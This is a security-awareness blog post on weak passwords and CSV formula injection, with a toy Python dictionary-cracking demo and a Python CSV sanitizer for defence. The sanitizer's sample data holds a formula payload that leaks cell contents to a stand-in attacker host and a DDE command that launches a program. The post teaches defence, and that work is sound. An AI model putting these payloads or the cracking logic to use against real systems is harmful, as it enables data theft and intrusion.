Have you ever leaned back in your chair and thought to yourself, “Wow, how in the world has my private information NOT been stolen?” Probably not. Or, if you are more like me, you quickly respond with a thought like, “Ah well. I’m probably fine,” and go about your day. This mindset, however, is proving to be EXTREMELY costly to many companies. By one estimate in the statistics articles linked below, businesses lost around $3,000,000,000,000 (three trillion dollars) to cyber attacks in a single year. At that rate, if every dollar stolen were put toward the American national debt instead, the debt would be paid off in less than a decade. That is a lot.
So, if you, like me, would rather not be responsible for the loss of 107,142.86* company dollars, then I have some good news. By being a bit more careful and a bit more intentional about security, you can protect yourself (and your company) from a surprisingly large number of attacks. I will not go into all of the details; I will leave that to the experts in the articles below. But I can at least give you some pointers to get you started (and hopefully also motivate you to keep learning).
First things first: passwords. If you see your password in this sentence, then you might as well not have a password (and 123456 is just as bad). One of the most common password-cracking techniques is the “dictionary attack”. Essentially, the attacker takes a large list (or several lists) of common passwords and password components, generates variations of each one (capitalize it, stick a “1” or a “!” or a year on the end), and tries every candidate until one works. What does this have to do with having “password” as a password? Well, “password” was the 8th most common password of 2016 according to the weak password article below, so it is all but guaranteed to be one of the first entries in any attacker’s dictionary. The usual defence against guessing (the infamous “Sorry, too many attempts, please try again later”) only slows an attacker down; it cannot stop an attack that needs just eight guesses, and it does nothing at all when the attacker is working offline against a copy of a stolen password database, which is where most real dictionary attacks happen (see the dictionary attack article below). So using “password” as your password negates those security measures almost entirely. It is like locking the door and leaving the window open. With that in mind, if you want to learn more about making good passwords (or even just decent passwords), I have included an article about that below, and you can find lots of information with a simple web search.
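To make the eight-guesses point concrete, here is an added example (my own illustration, not code from any of the linked articles) of a miniature dictionary attack in Python. The ten-entry word list, the handful of mangling rules, the salted SHA-256 hashing and the salt are all constructed for the demonstration; a real attacker’s list has millions of entries and thousands of rules. The example runs the same dictionary two ways: “online” against a login form that locks after a few attempts, and “offline” against a leaked hash with no limit at all.

```python
import hashlib
import secrets

# Constructed example list: the first ten entries of a 2016 "most common
# passwords" ranking, in rank order ("123456" first, "password" eighth).
COMMON_PASSWORDS = [
    "123456", "123456789", "qwerty", "12345678", "111111",
    "1234567890", "1234567", "password", "123123", "987654321",
]


def mangle(word):
    """Mangling rules: the 'different combinations' a dictionary attack tries.

    Eleven variants per base word here; cracking tools ship with thousands.
    """
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2016"):
        yield word + suffix
        yield word.capitalize() + suffix


def hash_password(password, salt):
    # Salted SHA-256 stands in for whatever scheme the site really uses. An
    # attacker holding a leaked database knows both the scheme and the salt.
    return hashlib.sha256(salt + password.encode()).hexdigest()


def online_guess(password_is_correct, lockout):
    """Guess against a live login form that locks after `lockout` attempts.

    Only the plain list is tried, in rank order, because every guess costs a
    request. Returns (password, guesses) on success, else (None, guesses).
    """
    guesses = 0
    for candidate in COMMON_PASSWORDS:
        if guesses >= lockout:
            break
        guesses += 1
        if password_is_correct(candidate):
            return candidate, guesses
    return None, guesses


def offline_crack(target_hash, salt):
    """Crack a leaked hash with no lockout: every word, every mangling rule."""
    guesses = 0
    for word in COMMON_PASSWORDS:
        for candidate in mangle(word):
            guesses += 1
            if hash_password(candidate, salt) == target_hash:
                return candidate, guesses
    return None, guesses


if __name__ == "__main__":
    salt = b"constructed-salt"
    # "password" falls on guess 78 and "Password2016" on guess 88; a random
    # passphrase survives all 110 candidates.
    for pw in ("password", "Password2016", secrets.token_urlsafe(12)):
        found, n = offline_crack(hash_password(pw, salt), salt)
        print(f"{pw!r}: {'cracked' if found else 'not found'} after {n} guesses")
    # A ten-attempt lockout does not help someone whose password is eighth
    # on the list; a five-attempt lockout only helps until the database leaks.
    print(online_guess(lambda c: c == "password", lockout=10))
    print(online_guess(lambda c: c == "password", lockout=5))
```

The lockout only matters for the online path, and even there “password” is found on the eighth attempt. Once the hashed database is stolen the attacker runs the offline path on their own hardware, where the only thing standing between them and your account is how far down the list your password sits.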
Now on to the security risk that sparked this article: CSV injection (also called formula injection). I will leave the details to the George Mauer article below, as he does a fantastic job explaining it. But in short: a CSV file is plain text, one row per line with the fields separated by commas, and it is the most basic spreadsheet format that programs like Microsoft Excel and Google Sheets will open. Those programs treat any cell that begins with = (or +, -, or @) as a formula, and a formula can do much more than arithmetic: it can build a web address out of the neighbouring cells and send it to the attacker, and on Windows it can even start another program. So if an attacker can get their text into something a company exports and opens as a spreadsheet (a display name in a list of sign-ups, a comment in a sales report), the attacker’s “cell” runs on the computer of whoever opens it, and can leak the contents of that spreadsheet or run commands on that machine. Yes. I am serious. If you write the code that produces such exports, the fix is to neutralize any cell that starts with one of those characters before it is written out. But there is one thing he mentions in passing that I think is important to remember if we are trying to be more intentional about cyber security, and it applies to everyone who opens a spreadsheet, not just developers. It may seem obvious, but perhaps because of its obviousness it tends to fly beneath the radar. Don’t mindlessly click the prompt. When you open a CSV file and a little box pops up saying something like “Do you want to open this file? Only click yes if you trust the source of this workbook,” or asking whether to start another application, do not just click yes without thinking, especially if you are an administrator with high-level permissions. Because we see tons of this type of prompt from day to day, we grow accustomed to them, and we are conditioned by the sheer number of prompts to click “yes” or “I accept the terms” just to get it over with. This is an issue in itself and may warrant a future article, but the point is: mindlessly clicking “yes” or “accept” can mean TREMENDOUS losses to your company, or to yourself.
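For the developers in the audience, here is an added example (mine, not code from George Mauer’s article) of the export-side fix in Python: a CSV writer that disarms any cell beginning with a formula trigger by prefixing it with a single quote, the standard advice for formula injection, alongside the unsanitized export so you can see the difference. The sign-up data, the e-mail addresses and the `attacker.invalid` domain are constructed; the two malicious cells use the well-known payload shapes discussed in the linked article (a HYPERLINK that concatenates neighbouring cells into a URL, and a Windows DDE command that launches the calculator).

```python
import csv
import io

# Characters that make Excel, LibreOffice and Google Sheets interpret a
# cell as a formula. Tab and carriage return are included because a cell
# starting with one of them can still be parsed as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize(cell):
    """Disarm a cell that would otherwise be treated as a formula.

    A leading single quote tells spreadsheet programs to keep the cell as
    literal text, so "=SUM(1,2)" is stored and shown as text, never run.
    """
    text = "" if cell is None else str(cell)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows, sanitize=True):
    """Serialize rows to CSV text. sanitize=False reproduces the vulnerable export."""
    buf = io.StringIO()
    # QUOTE_ALL wraps every field and doubles embedded quotes, so a payload
    # cannot break out of its own field into a new one.
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(c) if sanitize else c for c in row])
    return buf.getvalue()


def parse_csv(text):
    """Read CSV text back into a list of rows (used to check the round trip)."""
    return list(csv.reader(io.StringIO(text)))


def find_injected_cells(rows):
    """Audit helper: (row, column) of every cell a spreadsheet would run as a formula."""
    return [(r, c) for r, row in enumerate(rows) for c, cell in enumerate(row)
            if str(cell).startswith(FORMULA_TRIGGERS)]


# Constructed sample: a "user sign-ups" export in which two users typed
# formula payloads into the display-name field.
SIGNUPS = [
    ["name", "email", "plan"],
    ["Alice", "alice@example.com", "pro"],
    ['=HYPERLINK("http://attacker.invalid/?leak="&B2&B3, "click for invoice")',
     "mallory@example.com", "free"],
    ["=cmd|' /C calc'!A0", "mallory2@example.com", "free"],
    ["-1 +1 adjustments", "bob@example.com", "pro"],  # innocent, but starts with "-"
]


if __name__ == "__main__":
    print("Cells a spreadsheet would execute:", find_injected_cells(SIGNUPS))
    print("--- vulnerable export ---")
    print(export_rows(SIGNUPS, sanitize=False))
    print("--- sanitized export ---")
    print(export_rows(SIGNUPS))
```

Two caveats. The apostrophe is hidden by Excel and Sheets but is real data to anything else that reads the file, and it is applied to innocent values like “-1 +1 adjustments” too, so run `find_injected_cells` over an export before and after you turn sanitization on and make sure the affected columns are ones where that trade-off is acceptable. And sanitizing at export time protects only the files you generate; it does nothing for a CSV someone e-mails you, which is why the “don’t mindlessly click the prompt” rule still applies on the receiving end.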
By keeping these things in mind and just being a little bit more intentional and aware of computer security, we can go a long way toward protecting our finances and sensitive data from those who would steal them. So many security breaches happen simply because people are either uninformed or uninspired regarding computer security. If you, dear reader, fall into the first category, then I hope that this article has been enlightening, and I hope that you are encouraged to learn more about keeping your data (and your company’s data) safe. If you are in the second category, as I was for a long time, then I encourage you to take small steps to increase your security. A large percentage of attacks could be prevented if potential victims were just a little bit more aware, a little bit more intentional about keeping their data safe.
* $107,142.86 is the approximate total of money lost to cyber attacks in 2016 divided by the approximate number of businesses in the US, which was found with a quick Google search. So essentially an approximate average of dollars lost per company due to cyber attacks.
CSV Injection: http://georgemauer.net/2017/10/07/csv-injection.html
Some other security risks: https://heimdalsecurity.com/blog/10-critical-corporate-cyber-security-risks-a-data-driven-list/
Some statistics: https://www.csoonline.com/article/3153707/security/top-5-cybersecurity-facts-figures-and-statistics-for-2017.html
Lots of statistics: https://itspmagazine.com/from-the-newsroom/keep-calm-and-here-is-a-list-of-alarming-cybersecurity-statistics
Common password acquisition techniques: https://fossbytes.com/hacking-techniques/
Great article on Dictionary Attacks: https://www.schneier.com/blog/archives/2013/06/a_really_good_a.html
Article about weak passwords: http://www.dailymail.co.uk/sciencetech/article-4125128/The-common-passwords-used-2016.html
In case you are wondering why “3rjs1la7qe” is on the list of popular passwords: https://www.tripwire.com/state-of-security/featured/so-just-why-is-18atcskd2w-such-a-popular-password/
Article about strong passwords: https://www.howtogeek.com/195430/how-to-create-a-strong-password-and-remember-it/
Article about most common cybersecurity breaches: http://resources.infosecinstitute.com/the-top-five-cyber-security-vulnerabilities-in-terms-of-potential-for-catastrophic-damage/#gref